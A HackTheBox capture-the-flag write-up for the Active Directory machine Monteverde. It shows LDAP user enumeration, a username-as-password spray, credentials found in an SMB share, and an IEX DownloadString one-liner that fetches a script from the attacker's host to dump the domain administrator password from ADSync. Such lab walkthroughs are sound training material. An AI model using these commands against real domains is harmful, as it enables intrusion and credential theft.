HackTheBox - Monteverde
Monteverde is a Windows Active Directory HackTheBox machine that involved retrieving a list with local users with LDAP, performing password spraying to discover the credentials for a service account that had the password equal to the username, discoverying plaintext credentials in a configuration file, and finally taking advantage of the Azure Admins group membership to retrieve the administrator credentials.
Reconnaissance
Port Scan
Let’s start off with a port scan for all TCP ports with service/version detection.
$ nmap -Pn -p- -sV --max-retries 0 -oA nmap/full 10.10.10.172
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-22 09:24:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
[...]
LDAP Enumeration
Query for default naming context
$ ldapsearch -LLL -x -h 10.10.10.172 -s base -b '' defaultNamingContext
dn:
defaultNamingContext: DC=MEGABANK,DC=LOCAL
Retrieve a list of usersnames
$ ldapsearch -LLL -x -h 10.10.10.172 -b 'dc=megabank,dc=local' '(objectClass=user)' sAMAccountName \
| grep sAMA | cut -d ' ' -f2 | tail -n+4 | tee users.txt
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
Password Spraying
Trying to see if there is any user with its name as password
$ crackmapexec smb 10.10.10.172 -u users.txt -p users.txt
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:mhope STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:SABatchJobs STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:svc-ata STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:svc-bexec STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:svc-netapp STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:dgalanos STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:roleary STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:smorgan STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\SABatchJobs:mhope STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK\SABatchJobs:SABatchJob
Valid credentials found:
- User:
SABatchJobs - Password:
SABatchJobs
Foothold
Listing SMB shares as SABatchJobs
$ ./smbmap.py -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs'
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLY
azure_uploads and users shares are interesting. We can mount them locally and start exploring them. The first is empty, but the users$ one contains a few folders.
$ sudo mount -t cifs //10.10.10.172/users$ shares/ -o "username=SABatchJobs,password=SABatchJobs"
$ cd shares && ls -lh
total 0
drwxr-xr-x 2 root root 0 Jan 3 08:12 dgalanos
drwxr-xr-x 2 root root 0 Jan 3 08:41 mhope
drwxr-xr-x 2 root root 0 Jan 3 08:10 roleary
drwxr-xr-x 2 root root 0 Jan 3 08:10 smorgan
All the directories are empty, except themhope one, which contains an xml file.
$ ls -lh mhope
total 4.0K
-r-xr-xr-x 1 root root 1.2K Jan 3 08:40 azure.xml
The xml file contains a plaintext password:
The password we found inside the azure.xml file is the password of user mhope. With those credentials we can login into the box with WinRM.
$ evil-winrm -i 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'
*Evil-WinRM* PS C:\Users\mhope\Documents>
User flag:
*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
4961976bd7d8f[...]
Privilege Escalation to Domain Admin
ADSync
User mhope is a member of Azure Admins group
*Evil-WinRM* PS C:\Users\mhope\Music> whoami /groups | findstr Admin
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-...
Being in the Azure Admins group, we can use
Azure-ADConnect.ps1
script, to retrieve the administrator credentials, from the ADSync database.
*Evil-WinRM* PS C:\Users\mhope\Music> IEX(New-Object Net.WebClient).DownloadString('http://10.10.15.121:8000/Azure-ADConnect.ps1')
*Evil-WinRM* PS C:\Users\mhope\Music> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+] Password: d0m@in4dminyeah!
Login as Administrator via WinRM
$ evil-winrm -i 10.10.10.172 -u 'administrator' -p 'd0m@in4dminyeah!'
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Root flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
12909612d25c8dcf6[...]